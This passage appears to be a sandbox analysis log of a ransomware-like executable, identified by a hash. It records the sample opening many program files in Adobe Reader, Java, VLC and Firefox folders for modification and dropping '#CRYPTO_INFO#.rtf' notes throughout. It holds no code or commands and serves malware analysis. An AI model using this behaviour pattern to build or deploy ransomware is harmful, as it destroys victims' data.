(x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\apple-touch-icon-72x72-precomposed.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\84.0.4147.89.manifest 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themeless\review_poster.jpg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.apache.jasper.glassfish_2.2.2.v201205150955.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-openide-execution.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\ko-kr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.ui.zh_CN_5.5.0.165303.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\feature.properties 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\delete.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\images\themes\dark\s_radio_unselected_18.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\fi-fi\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\css\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\en-ae\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\THIRDPARTYLICENSEREADME.txt 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\images\themes\dark\illustrations_retina.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\locale\pt_PT\LC_MESSAGES\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\ro-ro\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\VideoLAN\VLC\skins\default.vlt 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ru\LC_MESSAGES\vlc.mo 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\sv_get.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\hi_contrast\aic_file_icons_highcontrast.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\pt-br\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\.settings\org.eclipse.equinox.p2.metadata.repository.prefs 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\sl-si\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\ar_get.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\images\themes\dark\rhp_world_icon_2x.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\skins\fonts\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\uk-ua\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.osgi.services.nl_ja_4.4.0.v20140623020002.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\liveleak.luac 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\es-es\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\Font\AdobePiStd.otf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\sa-jdi.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\nb-no\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\en-ae\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\management\management.properties 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.docs.zh_CN_5.5.0.165303.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\PDFSigQFormalRep.pdf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\bin\java-rmi.exe 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\pl-pl\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\plugins\selection-action-plugins\epdf\plugin.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\en-ae\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\ro-ro\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\cmm\sRGB.pf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-coredump_zh_CN.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-profiling_zh_CN.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\ro-ro\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\modules\org-netbeans-modules-profiler-attach.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\ko-kr\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.ui.css.core.nl_zh_4.4.0.v20140623020002.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\@1x\themes\dark\[email protected] 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\it-it\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\es-es\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\images\Confirmation.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\js\nls\fi-fi\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\ar-ae\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\sl-si\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\ext\meta-index 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\lib\locale\org-openide-util-lookup_ja.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\sv-se\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\sv-se\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\pt_BR\LC_MESSAGES\vlc.mo 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\en-il\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\sk-sk\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\ru_get.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\deploy\messages_it.properties 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\misc\load-typekit.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\icons_ie8.gif 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\libs\require\2.1.15\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\pl-pl\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\UnregisterGroup.asx 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\feature.properties 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\en-us\AppStore_icon.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\logging.properties 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\icons\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\Close2x.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\edit-pdf.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\lua\http\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\images\themes\dark\bun.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\locale\my\LC_MESSAGES\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\hu-hu\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Mozilla Firefox\uninstall\helper.exe 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\tr.gif 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\eu-es\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\nb-no\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\hr-hr\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\images\share_icons.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\circle.cur 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.net.nl_ja_4.4.0.v20140623020002.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\license.html 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.ui.css.core.nl_ja_4.4.0.v20140623020002.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\themes\dark\rhp_world_icon_hover_2x.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\eu-es\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\pl-pl\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\db\lib\derbynet.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\locale\fur\LC_MESSAGES\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\Font\ZY______.PFB 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\zh-tw\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\images\themes\dark\Info.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\pl-pl\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\js\nls\ja-jp\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\security\blacklisted.certs 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\plugin.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\about.html 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\cs-cz\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\pl-pl\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_opencarat_18.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\images\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\ca-es\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\da-dk\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\ru-ru\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\sl-si\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\META-INF\MANIFEST.MF 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-openide-explorer.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-progress-ui_ja.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\@1x\[email protected] 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\images\themes\dark\bg_pattern_RHP.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\nl-nl\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\nb-no\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_filter-down_32.svg 